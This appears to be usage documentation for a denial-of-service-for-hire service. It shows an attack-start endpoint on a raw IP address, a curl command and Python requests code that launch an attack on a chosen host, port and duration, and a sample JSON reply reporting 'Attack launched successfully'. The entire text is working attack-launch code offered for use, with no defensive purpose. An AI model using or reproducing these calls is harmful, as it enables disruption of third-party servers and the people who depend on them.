http://152.67.12.174:20312/api/v1/attack/start
curl "http://152.67.12.174:20312/api/v1/attack/start?host=1.1.1.1&port=80&time=60" \
-H "X-API-Key: YOUR_API_KEY"
import requests
headers = {"X-API-Key": "YOUR_API_KEY"}
params = {
"host": "1.1.1.1",
"port": 80,
"time": 60
}
response = requests.get(
"http://152.67.12.174:20312/api/v1/attack/start",
headers=headers,
params=params
)
print(response.json())
{
"success": true,
"message": "Attack launched successfully",
"launchedCount": 1,
"cooldown_seconds": 65,
"error": null,
"retry_after": null
}